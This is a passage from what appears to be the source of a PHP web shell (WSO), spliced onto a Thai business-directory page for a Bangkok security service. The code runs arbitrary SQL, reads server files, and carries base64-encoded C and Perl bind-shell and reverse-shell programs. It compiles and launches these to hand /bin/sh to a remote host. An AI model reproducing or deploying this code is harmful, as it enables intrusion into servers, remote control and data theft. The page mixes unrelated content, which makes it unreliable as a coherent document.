value='".$value."'>&nbsp;<a href=# onclick=\"st('".$value."')

\">".$value."</a> (".$n['n'].")</nobr><br>";
                }
                echo "<input type='checkbox' onclick='is();'> <input

type=button value='Dump'

onclick='document.sf.p2.value=\"download\";document.sf.submit

();'></td><td style='border-top:2px solid #666;'>";
                if(@$_POST['p1'] == 'select') {
                    $_POST['p1'] = 'query';
                    $db->query('SELECT COUNT(*) as n FROM '.$_POST

['p2'].'');
                    $num = $db->fetch();
                    $num = $num['n'];
                    echo "<span>".$_POST['p2']."</span> ($num) ";
                    for($i=0;$i<($num/30);$i++)
                        if($i != (int)$_POST['p3'])
                            echo "<a href='#' onclick='st(\"".$_POST

['p2']."\", $i)'>",($i+1),"</a> ";
                        else
                            echo ($i+1)," ";
                    if($_POST['type']=='pgsql')
                        $_POST['p3'] = 'SELECT * FROM '.$_POST['p2'].'

LIMIT 30 OFFSET '.($_POST['p3']*30);
                    else
                        $_POST['p3'] = 'SELECT * FROM `'.$_POST

['p2'].'` LIMIT '.($_POST['p3']*30).',30';
                    echo "<br><br>";
                }
                if((@$_POST['p1'] == 'query') && !empty($_POST['p3']))

{
                    $db->query(@$_POST['p3']);
                    if($db->res !== false) {
                        $title = false;
                        echo '<table width=100% cellspacing=0

cellpadding=2 class=main>';
                        $line = 1;
                        while($item = $db->fetch())    {
                            if(!$title)    {
                                echo '<tr>';
                                foreach($item as $key => $value)
                                    echo '<th>'.$key.'</th>';
                                reset($item);
                                $title=true;
                                echo '</tr><tr>';
                                $line = 2;
                            }
                            echo '<tr class="l'.$line.'">';
                            $line = $line==1?2:1;
                            foreach($item as $key => $value) {
                                if($value == null)
                                    echo '<td><i>null</i></td>';
                                else
                                    echo '<td>'.nl2br

(htmlspecialchars($value)).'</td>';
                            }
                            echo '</tr>';
                        }
                        echo '</table>';
                    } else {
                        echo '<div><b>Error:</b> '.htmlspecialchars

($db->error()).'</div>';
                    }
                }
                echo "<br><textarea name='p3'

style='width:100%;height:100px'>".@htmlspecialchars($_POST

['p3'])."</textarea><br/><input type=submit value='Execute'>";
                echo "</td></tr>";
            }
            echo "</table></form><br/><form

onsubmit='document.sf.p1.value=\"loadfile\";document.sf.p2.value=this.

f.value;document.sf.submit();return false;'><span>Load file</span>

<input  class='toolsInp' type=text name=f><input type=submit

value='>>'></form>";
            if(@$_POST['p1'] == 'loadfile') {
                $db->query("SELECT LOAD_FILE('".addslashes($_POST

['p2'])."') as file");
                $file = $db->fetch();
                echo '<pre class=ml1>'.htmlspecialchars($file

['file']).'</pre>';
            }
    }
    echo '</div>';
    printFooter();
}
function actionNetwork() {
    printHeader();
   

$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tld

C5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludCBtYWluKGludCBhcmdjLCBjaGF

yICphcmd2W10pIHsNCiAgICBpbnQgZmQ7DQogICAgc3RydWN0IHNvY2thZGRyX2luIHNpb

jsNCiAgICBkYWVtb24oMSwwKTsNCiAgICBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQo

gICAgc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJdKSk7DQogICAgc2luLnNpb

l9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsNCiAgICBmZCA9IHNvY2tldCh

BRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsNCiAgICBpZiAoKGNvbm5lY

3QoZmQsIChzdHJ1Y3Qgc29ja2FkZHIgKikgJnNpbiwgc2l6ZW9mKHN0cnVjdCBzb2NrYWR

kcikpKTwwKSB7DQogICAgICAgIHBlcnJvcigiQ29ubmVjdCBmYWlsIik7DQogICAgICAgI

HJldHVybiAwOw0KICAgIH0NCiAgICBkdXAyKGZkLCAwKTsNCiAgICBkdXAyKGZkLCAxKTs

NCiAgICBkdXAyKGZkLCAyKTsNCiAgICBzeXN0ZW0oIi9iaW4vc2ggLWkiKTsNCiAgICBjb

G9zZShmZCk7DQp9";
   

$back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZ

XRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2t

hZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwc

m90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCB

TT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0K

FNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCA

iPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSL

CAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0

KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
   

$bind_port_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQoj

aW5jbHVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxzdG

RsaWIuaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICoqYXJndikgew0KICAgIGludCBz

LGMsaTsNCiAgICBjaGFyIHBbMzBdOw0KICAgIHN0cnVjdCBzb2NrYWRkcl9pbiByOw0KIC

AgIGRhZW1vbigxLDApOw0KICAgIHMgPSBzb2NrZXQoQUZfSU5FVCxTT0NLX1NUUkVBTSww

KTsNCiAgICBpZighcykgcmV0dXJuIC0xOw0KICAgIHIuc2luX2ZhbWlseSA9IEFGX0lORV

Q7DQogICAgci5zaW5fcG9ydCA9IGh0b25zKGF0b2koYXJndlsxXSkpOw0KICAgIHIuc2lu

X2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7DQogICAgYmluZChzLCAoc3RydW

N0IHNvY2thZGRyICopJnIsIDB4MTApOw0KICAgIGxpc3RlbihzLCA1KTsNCiAgICB3aGls

ZSgxKSB7DQogICAgICAgIGM9YWNjZXB0KHMsMCwwKTsNCiAgICAgICAgZHVwMihjLDApOw

0KICAgICAgICBkdXAyKGMsMSk7DQogICAgICAgIGR1cDIoYywyKTsNCiAgICAgICAgd3Jp

dGUoYywiUGFzc3dvcmQ6Iiw5KTsNCiAgICAgICAgcmVhZChjLHAsc2l6ZW9mKHApKTsNCi

AgICAgICAgZm9yKGk9MDtpPHN0cmxlbihwKTtpKyspDQogICAgICAgICAgICBpZiggKHBb

aV0gPT0gJ1xuJykgfHwgKHBbaV0gPT0gJ1xyJykgKQ0KICAgICAgICAgICAgICAgIHBbaV

0gPSAnXDAnOw0KICAgICAgICBpZiAoc3RyY21wKGFyZ3ZbMl0scCkgPT0gMCkNCiAgICAg

ICAgICAgIHN5c3RlbSgiL2Jpbi9zaCAtaSIpOw0KICAgICAgICBjbG9zZShjKTsNCiAgIC

B9DQp9";
   

$bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYg

KEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0

lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50

IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRU

FERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8

IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbG

lzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgk

cGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKT

sNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJ

CW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ0

9OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAw

Ow0KCX0NCn0=";
    ?>
    <h1>Network tools</h1><div class=content>
    <form name='nfp' onSubmit="g

(null,null,this.using.value,this.port.value,this.pass.value);return

false;">
    <span>Bind port to /bin/sh</span><br/>
    Port: <input type='text' name='port' value='31337'> Password:

<input type='text' name='pass' value='wso'> Using: <select

name="using"><option value='bpc'>C</option><option

value='bpp'>Perl</option></select> <input type=submit value=">>">
    </form>
    <form name='nfp' onSubmit="g

(null,null,this.using.value,this.server.value,this.port.value);return

false;">
    <span>Back-connect to</span><br/>
    Server: <input type='text' name='server' value='<?=$_SERVER

['REMOTE_ADDR']?>'> Port: <input type='text' name='port'

value='31337'> Using: <select name="using"><option

value='bcc'>C</option><option value='bcp'>Perl</option></select>

<input type=submit value=">>">
    </form><br>
    <?php
    if(isset($_POST['p1'])) {
        function cf($f,$t) {
            $w=@fopen($f,"w") or @function_exists

('file_put_contents');
            if($w)    {
                @fwrite($w,@base64_decode($t)) or @fputs

($w,@base64_decode($t)) or @file_put_contents($f,@base64_decode($t));
                @fclose($w);
            }
        }
        if($_POST['p1'] == 'bpc') {
            cf("/tmp/bp.c",$bind_port_c);
            $out = ex("gcc -o /tmp/bp /tmp/bp.c");
            @unlink("/tmp/bp.c");
            $out .= ex("/tmp/bp ".$_POST['p2']." ".$_POST['p3']." &");
            echo "<pre class=ml1>$out\n".ex("ps aux | grep

bp")."</pre>";
        }
        if($_POST['p1'] == 'bpp') {
            cf("/tmp/bp.pl",$bind_port_p);
            $out = ex(which("perl")." /tmp/bp.pl ".$_POST['p2']." &");
            echo "<pre class=ml1>$out\n".ex("ps aux | grep

bp.pl")."</pre>";
        }
        if($_POST['p1'] == 'bcc') {
            cf("/tmp/bc.c",$back_connect_c);
            $out = ex("gcc -o /tmp/bc /tmp/bc.c");
            @unlink("/tmp/bc.c");
            $out .= ex("/tmp/bc ".$_POST['p2']." ".$_POST['p3']." &");
            echo "<pre class=ml1>$out\n".ex("ps aux | grep

bc")."</pre>";
        }
        if($_POST['p1'] == 'bcp') {
            cf("/tmp/bc.pl",$back_connect_p);
            $out = ex(which("perl")." /tmp/bc.pl ".$_POST['p2']."

".$_POST['p3']." &");
            echo "<pre class=ml1>$out\n".ex("ps aux | grep

bc.pl")."</pre>";
        }
    }
    echo '</div>';
    printFooter();
}
if( empty($_POST['a']) )
    if(isset($default_action) && function_exists('action' .

$default_action))
        $_POST['a'] = $default_action;
    else
        $_POST['a'] = 'SecInfo';
if( !empty($_POST['a']) && function_exists('action' . $_POST['a']) )
    call_user_func('action' . $_POST['a']);
?>
<div id="cot_tl_fixed"><marquee>Private Shell - Wireless crew &copy

Copyleft 2009 -Pro_Wikileaks </marquee></div>
Hacker-newbie.org </marquee></div>
  
ประเภทวัสดุ :รับบริการรักษาความปลอดภัย 24 ชั่วโมง(รับในเขตกรุงเทพฯ-ปริมณฑล)
เลขที่/อาคาร :297
ถนน :ประชาอุทิศ
แขวง/ตำบล :บางมด
เขต/อำเภอ :ทุ่งครุ
จังหวัด :กรุงเทพมหานคร
รหัสไปรษณีย์ :10140
โทรศัพท์ :024276093,0954032845
โทรศัพท์มือถือ :0954032845
  
ปรับปรุงข้อมูลล่าสุดเมื่อ 2 ต.ค. 2560 03:54:05
 กลับไปหน้าหลักทำเนียบโรงงาน ร้านค้า
สั่งพิมพ์หน้านี้
แนะนำหน้านี้ให้เพื่อน
จำนวนผู้เข้าชม472คน

 
 
กฎและกติกาการแสดงความคิดเห็น
  1. กรุณาใช้คำสุภาพในการแสดงความคิดเห็น งดใช้คำหยาบ ดูหมิ่น ส่อเสียด ให้ร้ายต่อบุคคลอื่น,สร้างความแตกแยก หรือ กระทบกับสถาบันอันเป็นที่เคารพของปวงชนชาวไทย
  2. หากทีมงานเว็บไซต์ ตรวจพบ หรือ มีผู้แจ้ง ทางเว็บไซต์ขอสงวนสิทธิ์ในการลบออก โดยไม่ต้องแจ้งให้ผู้แสดงความคิดเห็น
  3. ทุกคำที่แสดงความคิดเห็นนั้น เป็นความรับผิดชอบของผู้แสดงความคิดเห็นแต่เพียงผู้เดียว ทุกความเห็นที่แสดงความคิดเห็นไม่เกี่ยวข้องกับทางเว็บไซต์นี้โดยเด็ดขาด
  4. สำหรับผู้ที่ฝ่าฝืนกฎ และถูกดำเนินคดี เจ้าหน้าที่ตำรวจอาจติดต่อขอ IP เพื่อเป็นหลักฐานในการติดตามดำเนินคดีได้
 
 

หน้าแรก  l  กองบรรณาธิการ  l  เกี่ยวกับเรา l  คำแนะนำติชม l  ติดต่อเรา  l  ลงโฆษณา  l  ลงข้อมูลในเว็บ  l  ทำงานกับเรา  l  คำถามตอบบ่อย  l  ข้อบังคับด้านกฎหมาย  l  Site Map  l  เว็บพันธมิตร

© 2007-2011 All Right Reserved. thaicontractors.com